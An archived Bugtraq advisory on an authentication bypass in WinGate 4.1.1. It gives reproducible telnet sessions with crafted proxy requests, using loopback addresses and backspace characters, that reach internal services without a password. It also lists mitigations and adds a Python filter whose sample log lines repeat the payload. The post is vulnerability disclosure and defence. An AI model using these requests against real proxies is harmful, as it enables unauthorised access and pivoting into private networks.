Bugtraq mailing list archives
Wingate 4.1.1, new year's bug: UPDATE
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Thu, 25 Jan 2001 22:15:11 -0000
Hi,

I posted the mail below to Bugtraq a few days ago describing a somewhat weird bug in WinGate 4.1.1 (latest release) that allows bypassing all authentication/wrapper mechanisms in the software. After further tests, I think I know why.

When you configure a proxy service in the properties window, you have to choose, among others, your Bindings/Interfaces/Policy settings. These three are very important for your safety. The first determines which interfaces connections are allowed to come from. The second, to which ones they should be sent. The third determines your per-user policy.

By default, the bindings settings come with "Allow connections coming in on any interface" checked, which includes loopback 127.0.0.1. THE FLAW IS HERE !!

When connecting to my telnet redirector (port 23, with only one user "admin" allowed), I'm prompted for login/password, but when connecting directly from loopback (on the proxy host), no authentication at all! All clear: if users can use the HTTP proxy, they can use loopback and the redirector too to bypass authentication/IP wrapper for other services, as I described in the previous post. For example:

    #telnet wingate_ip 80
    GET http://127.0.0.1:23/

I changed my TELNET PROXY bindings settings to "Connections will be accepted from the following interface only xxx.xxx.xxx.xxx" (I mean anything other than loopback). I was unable to do a bounce attack anymore, even trying

    GET http://xxx.xxx.xxx.xxx:23

It seems to be a BUG in the security scheme used by WinGate, which trusts that anything coming from 127.0.0.1 is already authenticated. If you look at "advanced options" in the Options menu, you will find that the default configuration trusts any interface; you can't disable trusting of 127.0.0.1 (at least not with an eval version). Maybe disabling this would do the job.

My second piece of advice in my post was:

2/ Remove your services' default binding to 127.0.0.1; when you don't use a service at all, suppress all its instances.

Now I would say:

2/ ALWAYS remove your services' default binding to 127.0.0.1 (never use loopback), just use the IP address you really need!

Have a nice day,

===================================
Gregory Duchemin -- Security consultant
NEUROCOM CANADA
1001 bd maisonneuve Ouest, suite 200
Montreal, Quebec, H3A 3C8 Canada
c3rb3r () hotmail com
=======

Hi bugtraqers,

WinGate 4.1.1 is once again vulnerable because (once again!) of a too permissive redirector engine (tested with the Pro eval version on NT Server 4.0).

It's usual to say that redirector services, like telnet and ftp at least, should be granted to only a few people (authentication) and bound only on a private interface (binding configuration), while accepting connections from some specific network/IP (wrapping). Nevertheless, most of the time, HTTP proxies, even bound only on a private segment, are granted to all employees, for public usage.

There is a way to abuse WinGate's service authentication/wrapper/binding schemes simply by using the HTTP proxy. Any user allowed to connect to the proxy should be able to use any of the UP WinGate services.

For instance, if you create an admin account allowed to use your telnet and ftp services, while discarding all other users, you'll be asked for username/password authentication next time you connect to these ports (NT scheme or WinGate one, depending on what you chose). Weather is clear.

Now, if you connect to the web proxy port and craft a special request for the local telnet service while using ctrl-H chars, you will be able to bypass both the policy (authentication) and the IP wrapper (binding conf), leading to remotely forcing WinGate to open a telnet, ftp, whatever... connection to any other host, potentially even from outside to inside the corporate network if the HTTP proxy is reachable from outside (however, it was already a bad idea before this bug). If you don't use the telnet, ftp, whatever services but have left them bound on loopback (default configuration), you are vulnerable.

Take a look at that:

    #telnet 10.0.0.1
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escaped character is ^]
    Login:

The telnet redirector asks for a credential. Till now, everything looks quiet. And now....

    #telnet 10.0.0.1 80
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escaped character is ^]
    GET http://127.0.0.1:23/H3ll
    WinGate> GET /H3ll
    Connecting to host GET.....Host name lookup 'GET' Failed
    HTTP/1.0
    Connecting to host....Socket error
    blahblahblah........

Great! We catch a WinGate telnet prompt: WinGate>. Telnet even tried to connect to "GET /H3ll"! Maybe we could forge a good request (a valid hostname/IP). Let's try something with ^H (this old friend ;) )

    #telnet 10.0.0.1 80
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escaped character is ^]
    GET^H^H^H http://127.0.0.1:23/^H^H127.0.0.1        (3 ^H for GET, 2 more for / and ' ')
    WInGate>127.0.0.1
    Connecting to host 127.0.0.1...Connected
    Connection terminated by remote host
    Connection closed by foreign host

It's OK!... The connection was established between the telnet and pop3 services. It's possible to jump from service to service inside WinGate, bypassing every authentication system. Each connection is present in the logging window, but if you look more carefully in the telnet session properties you will see that we were telnet-authenticated as administrator (the only user allowed in the conf) without any password and from 127.0.0.1 ;) really funny!

Conclusion:

1/ Never grant access from outside your corporate network, especially to the HTTP proxy service. Allowing this would make all your private network vulnerable from the Internet; anybody would be able to pass through your proxy and thus potentially reach office servers through other WinGate services. Nothing really new.

2/ Remove your services' default binding to 127.0.0.1; when you don't use a service at all, suppress all its instances.

3/ Never use the telnet service: too weak, too dangerous.

Even with all the security rules above, users from inside your network may still be able to use the HTTP proxy as a redirector toward any other hosts/services.

4/ In the WWW proxy interface configuration, choose the right interface for outbound connections to prevent any redirection, and so any attack on your network.

I did not see any configuration option to, at least, fix a port range for all HTTP proxy requests. It would be a nice idea. I suppose things are quite similar using ftp to reach http, pop, telnet, ... and so on.

Any thoughts?

Have a nice day

===================================
Gregory Duchemin -- Security consultant
NEUROCOM CANADA
1001 bd maisonneuve Ouest, suite 200
Montreal, Quebec, H3A 3C8 Canada
c3rb3r () hotmail com
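A defender-side check for the two gaps the post points out (an HTTP proxy that will reach loopback/internal addresses, and no way to restrict the ports it connects to). This is an added example, not WinGate code or the author's: a per-request policy filter a proxy could apply, which can also be run over proxy log lines to flag bounce attempts; the port allow-list, the `localhost` handling and the sample request lines are assumptions and constructed data.

```python
import ipaddress
from urllib.parse import urlsplit
ALLOWED_PORTS = {80, 443, 8080}   # assumed policy: ports the proxy may reach for clients

def parse_target(request_line):
    """(host, port) from 'GET http://127.0.0.1:23/ HTTP/1.0' or 'CONNECT h:p', else None."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    if parts[0].upper() == "CONNECT":                      # CONNECT host:port
        host, _, port = parts[1].rpartition(":")
        return (host, int(port)) if port.isdigit() else None
    try:
        url = urlsplit(parts[1])
        if url.scheme not in ("http", "https") or not url.hostname:
            return None
        return (url.hostname, url.port or (443 if url.scheme == "https" else 80))
    except ValueError:                                     # malformed port/netloc
        return None

def is_internal(host):
    """Loopback/private/link-local/unspecified literal or 'localhost'; re-check after DNS in a real proxy."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def classify(request_line):
    # Returns the reason to refuse (or alert on) this request line, or None if it is acceptable.
    if any(ord(c) < 0x20 and c != "\t" for c in request_line):
        return "control characters in request line"        # the ^H trick from the post
    target = parse_target(request_line)
    if target is None:
        return None
    host, port = target
    if is_internal(host):
        return f"target {host} is loopback/internal"
    if port not in ALLOWED_PORTS:
        return f"port {port} not in allowed proxy port set"
    return None

SAMPLE_LOG = [                                             # constructed, not real logs
    "GET http://www.example.com/ HTTP/1.0",
    "GET http://127.0.0.1:23/ HTTP/1.0",
    "CONNECT mail.example.com:110 HTTP/1.0",
    "GET\x08\x08\x08 http://127.0.0.1:23/\x08\x08127.0.0.1",
]

def scan(lines=SAMPLE_LOG):
    # [(line, reason)] for every flagged request line in the log
    return [(line, reason) for line in lines if (reason := classify(line))]
```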